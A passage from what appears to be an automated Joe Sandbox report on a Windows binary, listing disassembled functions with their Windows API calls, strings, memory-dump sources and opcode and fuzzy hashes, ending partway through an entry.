                                                                                                                                                                  • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                                  • Instruction ID: 8b54c0f00c1114a385dbd7501d8d9560c4a2848d257be5bd852dbcbdfb908a3c
                                                                                                                                                                  • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A71C671A21F27ABE7149E68CC41BABB3F8AF14724F14412AF554D76C2E770DA608F90
                                                                                                                                                                  Function 002257FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00225816
                                                                                                                                                                  • GetMenuItemInfoW.USER32(002A18F0,000000FF,00000000,00000030), ref: 00225877
                                                                                                                                                                  • SetMenuItemInfoW.USER32(002A18F0,00000004,00000000,00000030), ref: 002258AD
                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 002258BF
                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00225903
                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 0022591F
                                                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00225949
                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 0022598E
                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 002259D4
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 002259E8
                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00225A09
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4176008265-0
                                                                                                                                                                  • Opcode ID: 5160d5a00508dbb5bdf7751193002de1fb332e674a5be27b0a8130e019f2d617
                                                                                                                                                                  • Instruction ID: 41c8b5be1c40989b38d33580134713cf44fc888fa3c88d58b7a232633bbf2e2a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5160d5a00508dbb5bdf7751193002de1fb332e674a5be27b0a8130e019f2d617
                                                                                                                                                                  • Instruction Fuzzy Hash: 0661E37092067AFFDB10CFE4EC88AAE7BB8EB05314F148119F442A7251D7B0AD65CB61
                                                                                                                                                                  Function 00249A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00249AA5
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00249AA8
                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00249ACC
                                                                                                                                                                  • _memset.LIBCMT ref: 00249ADD
                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00249AEF
                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00249B67
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$LongWindow_memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 830647256-0
                                                                                                                                                                  • Opcode ID: 1e247cd07a4bda4f2b3429723c7cf14938c63418771ca0b8056e465ff1f53f05
                                                                                                                                                                  • Instruction ID: c849d2ca78da984205cfe6c8c217fc6e2249696c5047fcbab7c2d06b6cce7774
                                                                                                                                                                  • Opcode Fuzzy Hash: 1e247cd07a4bda4f2b3429723c7cf14938c63418771ca0b8056e465ff1f53f05
                                                                                                                                                                  • Instruction Fuzzy Hash: 0E618B75A10208AFDB15DFA4DC81EEE77F8EF09710F10415AFA14A7291D774ADA1CB50
                                                                                                                                                                  Function 00223569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00223591
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00223612
                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 0022362D
                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00223647
                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 0022365C
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00223674
                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00223686
                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 0022369E
                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 002236B0
                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 002236C8
                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 002236DA
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                  • Opcode ID: 7f598bfce48c2f0a398d9d729150f24249e70e50ce6e53c16860f6fb45c223df
                                                                                                                                                                  • Instruction ID: e6ea73f2a278fb8ddde1115bbebd821aea2691c9011d7ff15763a27681242ffe
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f598bfce48c2f0a398d9d729150f24249e70e50ce6e53c16860f6fb45c223df
                                                                                                                                                                  • Instruction Fuzzy Hash: 4541F760A147DB7DFF30CFA4A4083B5BAA96B15344F448049D5C6462C2DBEC9BE88B69
                                                                                                                                                                  Function 0021A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0021A2AA
                                                                                                                                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 0021A2F5
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0021A307
                                                                                                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0021A327
                                                                                                                                                                  • VariantCopy.OLEAUT32(?,?), ref: 0021A36A
                                                                                                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 0021A37E
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0021A393
                                                                                                                                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 0021A3A0
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021A3A9
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0021A3BB
                                                                                                                                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021A3C6
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                                                  • Opcode ID: 82367166874ad46793c5ee63878485c7a8ec72da2d9fe9959827bf58e74d7d53
                                                                                                                                                                  • Instruction ID: b8d4d171c910da6a6e02a887d7738bd1d8e9f49f84618c9d10e617bb80fd5fb3
                                                                                                                                                                  • Opcode Fuzzy Hash: 82367166874ad46793c5ee63878485c7a8ec72da2d9fe9959827bf58e74d7d53
                                                                                                                                                                  • Instruction Fuzzy Hash: C9414E71E1121DAFDB01DFA4DC889EEBBB9FF58344F008065F511A3261DB70AA95CBA1
                                                                                                                                                                  Function 0023B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001E84A6: __swprintf.LIBCMT ref: 001E84E5
                                                                                                                                                                    • Part of subcall function 001E84A6: __itow.LIBCMT ref: 001E8519
                                                                                                                                                                  • CoInitialize.OLE32 ref: 0023B298
                                                                                                                                                                  • CoUninitialize.COMBASE ref: 0023B2A3
                                                                                                                                                                  • CoCreateInstance.COMBASE(?,00000000,00000017,0026D8FC,?), ref: 0023B303
                                                                                                                                                                  • IIDFromString.COMBASE(?,?), ref: 0023B376
                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0023B410
                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0023B471
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                  • API String ID: 834269672-1287834457
                                                                                                                                                                  • Opcode ID: 97b78203a02ee17a1c32b967302540d20f15cc7265879b1b1d47c068570aea8e
                                                                                                                                                                  • Instruction ID: 96096f93d0720879e1c91d06da42b607636ab34f518efd49248c2bd578358e3e
                                                                                                                                                                  • Opcode Fuzzy Hash: 97b78203a02ee17a1c32b967302540d20f15cc7265879b1b1d47c068570aea8e
                                                                                                                                                                  • Instruction Fuzzy Hash: D561DCB0624312AFC712DF54C888F6EB7E8AF88714F00444DFA859B2A1C7B0ED55CB92
                                                                                                                                                                  Function 00238694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • WSAStartup.WS2_32(00000101,?), ref: 002386F5
                                                                                                                                                                  • inet_addr.WS2_32(?), ref: 0023873A
                                                                                                                                                                  • gethostbyname.WS2_32(?), ref: 00238746
                                                                                                                                                                  • IcmpCreateFile.IPHLPAPI ref: 00238754
                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002387C4
                                                                                                                                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002387DA
                                                                                                                                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0023884F
                                                                                                                                                                  • WSACleanup.WS2_32 ref: 00238855
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                                                                  • String ID: Ping
                                                                                                                                                                  • API String ID: 1028309954-2246546115
                                                                                                                                                                  • Opcode ID: f746378f04819a9c2050cff854b2db5a962950321b126183e7b3a74d1daf9704
                                                                                                                                                                  • Instruction ID: a39dc3a83899c6522b69580445b51f315087cb1b072cfeeb1b34c0f0d69c0767
                                                                                                                                                                  • Opcode Fuzzy Hash: f746378f04819a9c2050cff854b2db5a962950321b126183e7b3a74d1daf9704
                                                                                                                                                                  • Instruction Fuzzy Hash: FB51C2716143059FD710EF25DC89B2ABBE4EF48720F10882AF956DB2A1DBB0EC11CB42
                                                                                                                                                                  Function 00249C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 00249C68
                                                                                                                                                                  • CreateMenu.USER32 ref: 00249C83
                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00249C92
                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00249D1F
                                                                                                                                                                  • IsMenu.USER32(?), ref: 00249D35
                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00249D3F
                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00249D70
                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00249D7E
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                                                                  • String ID: 0
                                                                                                                                                                  • API String ID: 176399719-4108050209
                                                                                                                                                                  • Opcode ID: 23574323d89a1fc33587ace7f24898025fbfd09a7102ec5d8d3e8f59956272e0
                                                                                                                                                                  • Instruction ID: a6b1ed30b1d21263a1e53ec40d09e80c37d98232dd1bb4dfaa5bacac71d01c34
                                                                                                                                                                  • Opcode Fuzzy Hash: 23574323d89a1fc33587ace7f24898025fbfd09a7102ec5d8d3e8f59956272e0
                                                                                                                                                                  • Instruction Fuzzy Hash: 90418A75A1020AEFDB14EF64E888BDA7BB5FF49314F144028F95697351D770A960CF60
                                                                                                                                                                  Function 0022EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0022EC1E
                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0022EC94
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0022EC9E
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 0022ED0B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                                                  • Opcode ID: 95da1eca0673eec70c1b42635f780a14b0b643fe68291ec9e8873d9387e0ba7a
                                                                                                                                                                  • Instruction ID: 2e3744a6a78f7d55a3d17299291d6f309bc851c5c19ae9045cf9929936c778a1
                                                                                                                                                                  • Opcode Fuzzy Hash: 95da1eca0673eec70c1b42635f780a14b0b643fe68291ec9e8873d9387e0ba7a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5D31F035A1021AAFCF00EFE4E849AAEB7B4EF55700F158066F405EB291DBB09E51DB81
                                                                                                                                                                  Function 0021C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0021C782
                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 0021C78D
                                                                                                                                                                  • GetParent.USER32 ref: 0021C7A9
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0021C7AC
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0021C7B5
                                                                                                                                                                  • GetParent.USER32(?), ref: 0021C7D1
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0021C7D4
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                                                  • Opcode ID: 570d988261fae244f10b17ca29fd0c09dedcdcdb313c1d97a39dd098315965f0
                                                                                                                                                                  • Instruction ID: a9159825d0f24626cbe8ddb517b8722b20ba52e859bfa716c0982bd4adf6a7eb
                                                                                                                                                                  • Opcode Fuzzy Hash: 570d988261fae244f10b17ca29fd0c09dedcdcdb313c1d97a39dd098315965f0
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D21C479A40208BFCF05EB60DC95DFEB7A9EB56300F204115F562931E1DBB45866DF20
                                                                                                                                                                  Function 0021C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 001ECAEE: _memmove.LIBCMT ref: 001ECB2F
                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0021C869
                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 0021C874
                                                                                                                                                                  • GetParent.USER32 ref: 0021C890
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 0021C893
                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 0021C89C
                                                                                                                                                                  • GetParent.USER32(?), ref: 0021C8B8
                                                                                                                                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 0021C8BB
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000028E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000029A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.00000000002B4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2961568682.000000000033D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962357717.0000000000343000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000007.00000002.2962471627.0000000000344000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_1e0000_UNK_.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                  • API String ID: 313823418-1403004172
                                                                                                                                                                  • Opcode ID: 553f05babc29592d301611cb629ed063924126d48320f812ca4c817dfd47ae4d
                                                                                                                                                                  • Instruction ID: f471c20ad46b8ddcf7e723c6df06979fa000807c6136e34a0152fe0e4fb5579a
                                                                                                                                                                  • Opcode Fuzzy Hash: 553f05babc29592d301611cb629ed063924126d48320f812ca4c817dfd47ae4d
                                                                                                                                                                  • Instruction Fuzzy Hash: E121C179A00208BFDF01AB60DC95EFEB7A9EB55300F204011F512A31A1DBB4586A9B20
                                                                                                                                                                  Function 0021C8CD Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetParent.USER32 ref: 0021C8D9
                                                                                                                                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 0021C8EE
                                                                                                                                                                  • _wcscmp.LIBCMT ref: 0021C900
                                                                                                                                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0021C97B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.2961568682.00000000001E1000.00000040.00000001.01000000.00000008.sdmp, Offset: 001E0000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.2961490557.00000000001E0000.00000002.00000001.01000000.00000008.sdmpDownload File
